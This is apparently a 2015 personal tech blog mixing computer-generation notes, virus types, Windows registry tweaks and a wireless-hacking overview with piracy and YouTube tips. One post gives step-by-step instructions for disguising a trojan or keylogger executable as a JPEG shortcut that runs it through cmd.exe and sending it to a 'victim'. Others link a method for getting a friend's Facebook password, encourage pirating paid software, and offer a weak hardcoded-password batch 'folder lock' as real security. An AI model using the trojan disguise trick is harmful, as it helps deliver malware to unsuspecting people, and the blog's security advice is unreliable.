CLICK TO HOSTING A WEBPAGE

Web hosting

Monday, August 31, 2015

What is fifth generation computer ?

Hello friends! In an computer era the development or grow up in computer technology is growing so most quickly.The process of development of computer by an era to era is called generation of computer.Basically there are upto fifth generation in computer development.In the first to third generation of computer development the cost of the computer machine is so much expensive.In forth generation the microprocessor invent which is the main features of the sucess of forth generation computer. The invented micro system reduces the cost of computer.Nowadays we all human have atleast one computer in a single home.And then the new generation of computer system after forth is view as fifth generation of computer.In fifth generation the computer work in the basics of artificial intilligence for eg Robot, chess game etc.

i) First Generation of Computers

1) Technology used: Vacuum tube
2) Operating speed: Millisecond range
3) Programming language used: Machine language
4) Memory used
: Primary memory: Magnetic core memory
: Secondary memory: Magnetic drum, Magnetic tape.
5) I/O device:
Punched card as input device, printing device as output device.
6) Use: Simple mathematical calculation.
7) Computers were extremely large in size, and they required special cooling system. e.g.: ENIVAC, EDVAC, UNIVAC, etc.

ii) Second Generation of Computers:

     1) Technology used: Transistor
     2) Operation speed: Micro second range (10-6 sec)
     3) Programming language used: Assembly language
     4) Memory used
           : Primary memory: Magnetic core memory.
           : Secondary memory: Magnetic drum, Magnetic tape.
     5) I/O: Punched card as input device, Printer as output device
     6) Use: Computers were used for complex scientific calculations.
     7) The size, cost, power requirement, heat generation decreased compared to previous generation.
     8) Processing speed, storage capacity, use of the computer increased compared to previous generation.
E.g.: IBM 1620, IBM 7094, LEO MARK III, etc.

Advantages of transistor over vacuum tube:

   i) One transistor could replace one thousand vacuum tubes.
  ii) Size of a transistor is 1/200 th times of a vacuum tube.
 iii) The power requirement of a transistor is 1/20 th times of a vacuum tube.
 iv) Transistors are more reliable than vacuum tube.

iii) Third Generation of Computers

i) Technology used: IC (Integrated Circuit)
ii) Operating speed: Nanosecond range (10 -9 sec)
iii) Programming language used: HLL (High Level Language)
                            Like FORTAN, COBOL, PASCAL, C, C++, etc.
iv) Memory used:
           Primary memory: Semiconductor memory (silicon)
          Secondary memory: Magnetic tape, Magnetic disk like floppy disk, hard disk, etc)
v) I/O device: Keyboard as input device, monitor as output device.
vi) Use: Computers were used for managing population census, bank, insurance company, etc.
vii) Concept of database was developed and used.
viii) Size, cost, power requirement, heat generation decreased compared to previous generations.
ix) Processing speed, storage capacity, use of the computer increased compared to previous generations.
E.g.: IBM 360 series, ICL 900 series, Honeywell 200 series, etc.

IC and its types:

IC is a small silicon chip which contains large number of electronic components like transistor, resistor, capacitor, etc.
The process of creation of IC is called fabrication.
Types of IC on the basis of number of electronic components.
    i) SSI (Small Scale Integration)
           (1-20 components)
   ii) MSI (Medium Scale Integration)
           (21-100 components)
  iii) LSI (Large Scale Integration)
          (101-1000 components)
 iv) VLSI (Very Large Scale Integration)
          (1001-10000 components)
 v) ULSI ( Ultra Large Scale Integration)
          (More than 10000 components)

iv) Fourth Generation of Computers:

         1) Technology used:- VLSI (or Microprocessor)
         2) Operating speed:- Pico second range
         3) Programming language used: 4GL (Problem Oriented Language)
         4) Memory used:
                  Primary: Semi-conductor memory
                  Secondary: Magnetic tape, Magnetic Disk, Optical memory (CD/DVD/ Blu ray), Flash
                                    memory(pen drive, memory card)
        5) I/O device:
               Advanced I/O devices like mouse, touch screen, scanner, LCD, LED, color printer, etc are developed.
        6) Use:
               Computers are used for different task in different areas like education, business, hospital, transportation, military, etc.
7) Microcomputers like desktop PC, laptop, notebook, etc, are developed.
8) The popular communication media like internet, email, mobile communication, etc were developed.
9) Advanced, user friendly, web based software, etc are developed.
10) Size, cost, power requirement, heat generation decreased compared to previous generation.
11) Operating speed, storage capacity, use of the computer increased compared to previous generation.
E.g.: IBM desktop PC, HP laptop, Acer notebook, Mac book, etc.

vi) Fifth Generation of Computers:

1) Technology to be used:- Bio-chip
2) Operating speed:- Femto second range
(10 -15 second) / TIPS
3) Programming language to be used:- Natural language
4) The computers will have AI.
5) The computers will be used in complex calculation where intelligence of the computer is required.
6) The computers will have parallel processing in full fledge.
7) The computers will be based on KIPS (Knowledge based Information Processing System)

Different type of virus.

The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.


How to know your friend facebook password ?

https://youtu.be/CM6TvWLZlF0

Saturday, August 29, 2015

Pop A Banner Each Time Windows Boots

Pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Run Firefox inside Firefox

Hello friend this is interesting article 
                                 How to run Firefox inside Firefox.?

Yup you can run Firefox inside firefox just by typing following url.

How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!

copy paste following url in a web browser (mozilla firefox).

chrome://browser/content/browser.xul



Remove shortcut arrow from desktop icons completely

To remove shortcut arrow from desktop icons in any type of document:


a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.

b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.

c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.

So, here is a summary of all actions:

1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.

4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.

6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.

14. Close regedit.

Logoff and… Enjoy!

Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

Thursday, August 27, 2015

What is a hacker?

A hacker is someone who likes to tinker with electronics or computer systems. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren’t intended to do.

There are two types of hackers:

White Hat – 

These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats. 

Black Hat – 

These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards, and deface websites.  

These two terms came from the old western movies where the good guys wore white hats and the bad guys wore black hats.

Now if you’re thinking, “Oh boy! Being a black hat sounds awesome!”, Then I have a question for you. Does it sound cool to live in a cell the size of your bathroom and be someone’s butt buddy for many years? That’s what I thought

:) so if you want perform hack activities then go to your bathroom and stay there at least an hour.

But friend safe hacking doesn't need to go to bathroom for an hour.Therefore make your machine at that limit that no one can get you.For eg:-change your ip at an interval change mac address etc.This is not so much.

REMEMBER ONE THING IF YOUR ARE USING LOCAL ISP THEN ITS MOST CHANCE THAT YOU CAN GET TRACE.

THANK YOU THIS IS FOR ENTERTAINMENT PURPOSE ONLY.
LIKE THEN SHARE IT AND GIVE ME A CHANCE TO WRITE THIS TYPE OF ARTICLE.

About wireless hacking?

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :-
The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :-
APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Hide Entire Drives Partition Without Registry?

Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.

DISKPART>

2) Then type "list volume"

3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.
Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E". 

How to hide exe file in jpg file ?

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Wednesday, August 26, 2015

How to download videos form youtube or any other site?

Hello ,
          Today i will show you how to download video from youtube OR ANY website its  simple and easy.

TO DOWNLOAD VIDEO FROM YOUTUBE A DOWNLOADER NEEDED:-
                  FOR EXAMPLE:-

1:-INTERNET DOWNLOAD MANAGER :-
                                                      It seems most popular downloader ever its divide the download in segment an can download big size data fast.You can also set limit for the download ratio.You can download it from torrent because torrent is only the site which provide pirates software.But if you want to paid for the software you can buy it. :) :P But if we can use it free then why should we pay for it :) :P =D so download it from torrent.
IF YOU WANT TO KNOW ABOUT TO ADD IDM EXTENSION IN BROWSER PLEASE CHECK MY NEXT TUTORIAL.

2:-FLAREGET DOWNLOAD MANAGER :-
                                                    It is also the most popular download manager. For this also we have to pay you can also download it from its own website and also from torrent :) :P =D ------ I DONT NEED TO SAY WHY TO USE TORRENT YOU UNDERSTAND I THINK.
                  YOU HAVE TO ADD EXTENSION OF FLARE GET IN BROWSER ITS SO EASY: CLICK ON TOOL>SETTING>BROWSER INTEGRATION SETTING>


3:-FREE DOWNLOAD MANAGER :-
                                                  
It is a powerful, easy-to-use and absolutely free download accelerator and manager.
Moreover, FDM is , open-source software distributed under GPL license
   
 ITS FEATURES ARE:-
  • Increase your download speed
  • Resume broken downloads
  • Enjoy safer and more rewarding downloading
  • HTTP/FTP/Bit Torrent support
  • GNU General Public License
ONE SUGGESTION KICK ALL THE DOWNLOAD MANAGER BESIDES THIS.
          If you like please share this tutorial and give me a chance for wirting further this type of tutorial.

Friday, August 7, 2015

How to earn money from blog or blogspot ?

About the Blogger "Earnings" 

The Earnings tab in Blogger makes it easy to enable Ad-sense ads on your blog. Once your account has been approved, you can go to the earnings tab to go to your AdSense dashboard.You receive the earning in your bank account or through draft.While creating adsense account you have to clearly feel the details in which you want to get the amount.

Earning tab what is earning tab:- Its the tab to enable your adsense account.

In selected country you cannot create a adsense id for few month .

If the signup for adsense is active then only you can sign up.

How to active google adsense:-


If your email id was submitted for adsense already if you have adsense then the adsense was self active.

How much you can earn and whats the medium to earn:-

  • Page views: A page view is generated every time a user views a page displaying Google ads. We'll count one page view regardless of the number of ads displayed on that page. For example, if you have a page displaying three ad units and it's viewed twice, you'll generate two page views and six ad unit impressions.
  • Clicks: The number of times the ads were clicked on in the given reporting period.
  • Page CTR (Click-through rate): The number of ad clicks divided by the number of page views.
  • CPC (Cost per click): The average amount paid by the advertisers for each ad click.
  • Page RPM (Revenue per mille): This is revenue per 1,000 page views. RPM = (Page views x CTR x CPC) / 1,000

Thursday, August 6, 2015

How to download a file From torrent ?

Hello, torrent is an well known website for the piracy use of anything. Its the most powerful website which provide everything like movie , software , game , etc.we don't have to pay for it its all free :) :-

      Today i am showing you how to download anything from torrent:-

To download its need :-

                                  1:- Browser (To open website)
                                  2:- And the torrent file down loader like BitTorrent  , uTorrent and many more . . Google it you can find it.

                              Lets go :-

1 :) First open your website and type > kat.ph
2 :) Search the content you want to download.
3 :) Now you got your list click on the file you want to download.
4 :) Now look for this picture up left  in your window.
5:) Now click on this icon or figure :-
6:-After that you got this icon its down enjoy :) 

Tuesday, August 4, 2015

How to lock the folder in window?

 Folder Lock Without Any Software :-



Folder Lock With Password Without Any Software-

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.

                                  Let's Start:-



if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Thank you please comment.

How to monetize YouTube account ?

In some country monetization is not allowed by YouTube.

                                   But we can monetize our YouTube account with just change the location of  your YouTube account details first know the country in which monetization is allowed and change the location of the country. Then you can monetize the YouTube account.
                               For eg :- monetization is not allowed in Nepal. But we can change the location and can monetize the YouTube account successfully.

To change the location :-

Go to the circle type icon in up rights of your youtube account and click there:-
Then click on the setting type icon:-
Then click on overview:-
Then click on additional features:-
Now you are on channel tab  click on advanced Button in that tab and change the location there
Now you are on monetize YouTube.


Thank you . if you like please comment the limitation of my tutorial please to improve it.